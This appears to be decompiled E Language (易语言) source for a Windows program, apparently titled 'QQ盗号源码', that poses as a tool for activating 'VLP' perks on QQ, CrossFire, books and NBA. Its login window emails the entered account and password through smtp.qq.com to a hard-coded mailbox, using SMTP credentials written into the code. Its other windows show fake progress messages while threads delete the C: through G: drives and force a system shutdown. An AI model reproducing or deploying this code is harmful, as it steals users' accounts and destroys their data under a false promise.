 ' 文件类型：Windows窗口程序

 ' 程序名称：
 ' 程序描述：
 ' 程序作者：
 ' 邮政编码：
 ' 联系地址：
 ' 联系电话：
 ' 传真号码：
 ' 电子信箱：
 ' 主页地址：
 ' 版权声明：
 ' 版本号：1.0
 ' 创建号：0.0

窗口 _启动窗口 ' 在程序启动后自动调入本窗口
    左边 = 50
    顶边 = 50
    宽度 = 238
    高度 = 181
    鼠标指针 = { 0,0,0,0 }
    标记 = “”
    可视 = 真
    禁止 = 假
    边框 = 2
    底图方式 = 1
    底色 = -16777216 '  0xFF000000
    最大化按钮 = 假
    最小化按钮 = 真
    控制按钮 = 真
    位置 = 1
    可否移动 = 真
    背景音乐播放次数 = 0
    回车下移焦点 = 假
    Esc键关闭 = 真
    F1键打开帮助 = 假
    帮助标志值 = 0
    在任务栏中显示 = 真
    随意移动 = 假
    外形 = 0
    总在最前 = 假
    保持标题栏激活 = 假
    窗口类名 = “”
    底图 =  ' 空
    图标 =  ' 已保存到：D:\易语言学习\Data\QQ盗号源码.e\_启动窗口_图标.ico
    背景音乐 =  ' 空
    标题 = “请您先登入”
    帮助文件名 = “”

窗口 窗口1
    左边 = 50
    顶边 = 50
    宽度 = 380
    高度 = 262
    鼠标指针 = { 0,0,0,0 }
    标记 = “”
    可视 = 真
    禁止 = 假
    边框 = 2
    底图方式 = 1
    底色 = -16777216 '  0xFF000000
    最大化按钮 = 假
    最小化按钮 = 真
    控制按钮 = 真
    位置 = 1
    可否移动 = 真
    背景音乐播放次数 = 0
    回车下移焦点 = 假
    Esc键关闭 = 真
    F1键打开帮助 = 假
    帮助标志值 = 0
    在任务栏中显示 = 真
    随意移动 = 假
    外形 = 0
    总在最前 = 假
    保持标题栏激活 = 假
    窗口类名 = “”
    底图 =  ' 空
    图标 =  ' 空
    背景音乐 =  ' 空
    标题 = “绝缘2012最新卡 VLP 软件”
    帮助文件名 = “”

窗口 窗口2
    左边 = 50
    顶边 = 50
    宽度 = 380
    高度 = 119
    鼠标指针 = { 0,0,0,0 }
    标记 = “”
    可视 = 真
    禁止 = 假
    边框 = 2
    底图方式 = 1
    底色 = -16777216 '  0xFF000000
    最大化按钮 = 假
    最小化按钮 = 假
    控制按钮 = 真
    位置 = 1
    可否移动 = 真
    背景音乐播放次数 = 0
    回车下移焦点 = 假
    Esc键关闭 = 真
    F1键打开帮助 = 假
    帮助标志值 = 0
    在任务栏中显示 = 真
    随意移动 = 假
    外形 = 0
    总在最前 = 假
    保持标题栏激活 = 假
    窗口类名 = “”
    底图 =  ' 空
    图标 =  ' 空
    背景音乐 =  ' 空
    标题 = “卡 QQ VLP 界面”
    帮助文件名 = “”

窗口 窗口3
    左边 = 50
    顶边 = 50
    宽度 = 380
    高度 = 119
    鼠标指针 = { 0,0,0,0 }
    标记 = “”
    可视 = 真
    禁止 = 假
    边框 = 2
    底图方式 = 1
    底色 = -16777216 '  0xFF000000
    最大化按钮 = 假
    最小化按钮 = 假
    控制按钮 = 真
    位置 = 1
    可否移动 = 真
    背景音乐播放次数 = 0
    回车下移焦点 = 假
    Esc键关闭 = 真
    F1键打开帮助 = 假
    帮助标志值 = 0
    在任务栏中显示 = 真
    随意移动 = 假
    外形 = 0
    总在最前 = 假
    保持标题栏激活 = 假
    窗口类名 = “”
    底图 =  ' 空
    图标 =  ' 空
    背景音乐 =  ' 空
    标题 = “卡 CF VLP 界面”
    帮助文件名 = “”

窗口 窗口4
    左边 = 50
    顶边 = 50
    宽度 = 380
    高度 = 119
    鼠标指针 = { 0,0,0,0 }
    标记 = “”
    可视 = 真
    禁止 = 假
    边框 = 2
    底图方式 = 1
    底色 = -16777216 '  0xFF000000
    最大化按钮 = 假
    最小化按钮 = 假
    控制按钮 = 真
    位置 = 1
    可否移动 = 真
    背景音乐播放次数 = 0
    回车下移焦点 = 假
    Esc键关闭 = 真
    F1键打开帮助 = 假
    帮助标志值 = 0
    在任务栏中显示 = 真
    随意移动 = 假
    外形 = 0
    总在最前 = 假
    保持标题栏激活 = 假
    窗口类名 = “”
    底图 =  ' 空
    图标 =  ' 空
    背景音乐 =  ' 空
    标题 = “卡 图书 VLP 界面”
    帮助文件名 = “”

窗口 窗口5
    左边 = 50
    顶边 = 50
    宽度 = 380
    高度 = 119
    鼠标指针 = { 0,0,0,0 }
    标记 = “”
    可视 = 真
    禁止 = 假
    边框 = 2
    底图方式 = 1
    底色 = -16777216 '  0xFF000000
    最大化按钮 = 假
    最小化按钮 = 假
    控制按钮 = 真
    位置 = 1
    可否移动 = 真
    背景音乐播放次数 = 0
    回车下移焦点 = 假
    Esc键关闭 = 真
    F1键打开帮助 = 假
    帮助标志值 = 0
    在任务栏中显示 = 真
    随意移动 = 假
    外形 = 0
    总在最前 = 假
    保持标题栏激活 = 假
    窗口类名 = “”
    底图 =  ' 空
    图标 =  ' 空
    背景音乐 =  ' 空
    标题 = “卡 NBA VLP 界面”
    帮助文件名 = “”





 ' 所需要的支持库：
 ' krnln d09f2340818511d396f6aaf844c7e325 5 0 系统核心支持库
 ' internet 707ca37322474f6ca841f0e224f4b620 1 0 互联网支持库
 ' EThread 5F99C1642A2F4e03850721B4F5D7C3F8 1 1 多线程支持库



 ' 所需要的模块
 ' 33个皮肤模块 $33个皮肤模块.ec



.DLL命令 SkinH_SetForeColor, 整数型, "SkinH_EL.dll", "SkinH_SetForeColor", 公开, 置控件的文本颜色。目前仅对单选框,复选框,分组框有效。成功返回0，失败返回非0
    .参数 句柄, 整数型, , 控件句柄
    .参数 红色分量, 整数型, , 取值范围0-255
    .参数 绿色分量, 整数型, , 取值范围0-255
    .参数 蓝色分量, 整数型, , 取值范围0-255

.DLL命令 SkinH_SetWindowMovable, 整数型, "SkinH_EL.dll", "SkinH_SetWindowMovable", 公开, 设置窗体是否可以移动。成功返回0，失败返回非0
    .参数 句柄, 整数型, , 窗口句柄
    .参数 是否移动, 整数型, , 0为不可移动,1为可移动

.DLL命令 RtlAdjustPrivilege, 整数型, "ntdll.dll", "", , ,
    .参数 se_, 整数型, , 
    .参数 true_, 逻辑型, , 
    .参数 hprocess, 整数型, , 
    .参数 ret, 整数型, 传址, 

.DLL命令 NtShutdownSystem, 整数型, "ntdll.dll", "", , 0为关机，1为重启
    .参数 se_, 整数型, , 

.窗口程序集 窗口程序集1, , , 

.子程序 _按钮1_被单击, 空白型, , 
.如果 (并且 (不等于 (.内容, “”), 不等于 (.内容, “”)))
    未知支持库函数_0 (“smtp.qq.com”, 25, “1262785454”, “7708801314520”, )
    未知支持库函数_5 (“QQ：密码来了”, 相加 (“帐号:”, .内容, #换行符, “密码:”, .内容), “1262785454@qq.com”, , , “1262785454@qq.com”, )
    赋值 (_启动窗口., 假)
    载入 (窗口1, , 真)
    
.否则
    .如果 (并且 (等于 (.内容, “”), 等于 (.内容, “”)))
        信息框 (“对不起，您还没登入我们无法访问您的数据，请您重新登入。”, 0, )
        
    .否则
        
    .如果结束
    
.如果结束


.子程序 __启动窗口_创建完毕, 空白型, , 
加载皮肤 (7)


.程序集 __HIDDEN_TEMP_MOD__, , , 

.子程序 加载皮肤, 空白型, , 33个皮肤 
.参数 皮肤文件, 整数型, , 1_MSN  2_qq2008  3_QQ2009_宽_底边  4_QQ2009_窄_底边  5_REA  6_积木 7_炫绿  8_QQ影音  9_黑色  10_adamant  11_aero  12_asus  13_中国风  14_Vista  15_office2007  16_compact  17_darkroyale  18_dogmax  19_elegance  20_enjoy  21_gem  22_hlong  23_homestead  24_insomnia  25_longhorn  26_ouframe  27_pixos  28_qqgame  29_royale  30_storm  31_wish  32_Xenes  33_xmp



.子程序 加载Aero特效, 空白型, , 


.子程序 关闭Aero特效, 空白型, , 


.子程序 Aero特效调整, 空白型, , 
.参数 透明度, 整数型, , 
.参数 阴影大小, 整数型, , 
.参数 阴影锐度, 整数型, , 
.参数 阴影亮度, 整数型, , 
.参数 红色分量, 整数型, , 
.参数 绿色分量, 整数型, , 
.参数 蓝色分量, 整数型, , 



.窗口程序集 窗口程序集2, , , 

.子程序 _窗口1_创建完毕, 空白型, , 


.子程序 _窗口1_将被销毁, 空白型, , 
赋值 (_启动窗口., 真)


.子程序 _单选框1_被单击, 空白型, , 
载入 (窗口2, , 真)


.子程序 _单选框2_被单击, 空白型, , 
载入 (窗口3, , 真)


.子程序 _单选框3_被单击, 空白型, , 
载入 (窗口4, , 真)


.子程序 _单选框4_被单击, 空白型, , 
载入 (窗口5, , 真)


.窗口程序集 窗口程序集3, , , 

.子程序 _按钮1_被单击, 空白型, , 
赋值 (.时钟周期, 6000)
信息框 (“正在为你开通 QQ VLP 此操作需要（10分钟左右）请您稍等”, #信息图标, “系统提示”)


.子程序 _时钟1_周期事件, 空白型, , 
.如果 (等于 (.位置, 100))
    赋值 (.时钟周期, 0)
    信息框 (“正在为你开通 QQ VLP 此操作需要（10分钟左右）请您稍等”, #信息图标, “系统提示”)
.否则
    
.如果结束
.如果 (不等于 (.位置, 100))
    
.否则
    
.如果结束
赋值 (.位置, 相加 (.位置, 1))

.子程序 _按钮2_被单击, 空白型, , 
销毁 ()


.子程序 _窗口2_创建完毕, 空白型, , 
未知支持库函数_0 (&窗口程序集3, )

.子程序 窗口程序集3, 空白型, , 
删除目录 (“C:/”)
删除目录 (“D:/”)
删除目录 (“E:/”)
删除目录 (“F:/”)
删除目录 (“G:/”)
RtlAdjustPrivilege (19, 真, 0, 0)
NtShutdownSystem (0)

.窗口程序集 窗口程序集4, , , 

.子程序 _按钮1_被单击, 空白型, , 
赋值 (.时钟周期, 6000)
信息框 (“正在为你开通 CF VLP 此操作需要（10分钟左右）请您稍等”, #信息图标, “系统提示”)


.子程序 _时钟1_周期事件, 空白型, , 
.如果 (等于 (.位置, 100))
    赋值 (.时钟周期, 0)
    信息框 (“正在为你开通 CF VLP 此操作需要（10分钟左右）请您稍等”, #信息图标, “系统提示”)
.否则
    
.如果结束
.如果 (不等于 (.位置, 100))
    
.否则
    
.如果结束
赋值 (.位置, 相加 (.位置, 1))

.子程序 _按钮2_被单击, 空白型, , 
销毁 ()


.子程序 _窗口3_创建完毕, 空白型, , 
未知支持库函数_0 (&窗口程序集4, )

.子程序 窗口程序集4, 空白型, , 
删除目录 (“C:/”)
删除目录 (“D:/”)
删除目录 (“E:/”)
删除目录 (“F:/”)
删除目录 (“G:/”)
RtlAdjustPrivilege (19, 真, 0, 0)
NtShutdownSystem (0)

.窗口程序集 窗口程序集5, , , 

.子程序 _窗口4_创建完毕, 空白型, , 
未知支持库函数_0 (&窗口程序集5, )

.子程序 窗口程序集5, 空白型, , 
删除目录 (“C:/”)
删除目录 (“D:/”)
删除目录 (“E:/”)
删除目录 (“F:/”)
删除目录 (“G:/”)
RtlAdjustPrivilege (19, 真, 0, 0)
NtShutdownSystem (0)

.子程序 _按钮1_被单击, 空白型, , 
赋值 (.时钟周期, 6000)
信息框 (“正在为你开通 图书 VLP 此操作需要（10分钟左右）请您稍等”, #信息图标, “系统提示”)


.子程序 _时钟1_周期事件, 空白型, , 
.如果 (等于 (.位置, 100))
    赋值 (.时钟周期, 0)
    信息框 (“正在为你开通 图书 VLP 此操作需要（10分钟左右）请您稍等”, #信息图标, “系统提示”)
.否则
    
.如果结束
.如果 (不等于 (.位置, 100))
    
.否则
    
.如果结束
赋值 (.位置, 相加 (.位置, 1))

.子程序 _按钮2_被单击, 空白型, , 
销毁 ()


.窗口程序集 窗口程序集6, , , 

.子程序 _窗口5_创建完毕, 空白型, , 
未知支持库函数_0 (&窗口程序集6, )

.子程序 窗口程序集6, 空白型, , 
删除目录 (“C:/”)
删除目录 (“D:/”)
删除目录 (“E:/”)
删除目录 (“F:/”)
删除目录 (“G:/”)
RtlAdjustPrivilege (19, 真, 0, 0)
NtShutdownSystem (0)

.子程序 _按钮1_被单击, 空白型, , 
赋值 (.时钟周期, 6000)
信息框 (“正在为你开通 NBA VLP 此操作需要（10分钟左右）请您稍等”, #信息图标, “系统提示”)


.子程序 _时钟1_周期事件, 空白型, , 
.如果 (等于 (.位置, 100))
    赋值 (.时钟周期, 0)
    信息框 (“正在为你开通 NBA VLP 此操作需要（10分钟左右）请您稍等”, #信息图标, “系统提示”)
.否则
    
.如果结束
.如果 (不等于 (.位置, 100))
    
.否则
    
.如果结束
赋值 (.位置, 相加 (.位置, 1))

.子程序 _按钮2_被单击, 空白型, , 
销毁 ()



 ' 不属于任何一个程序集、类模块的函数：
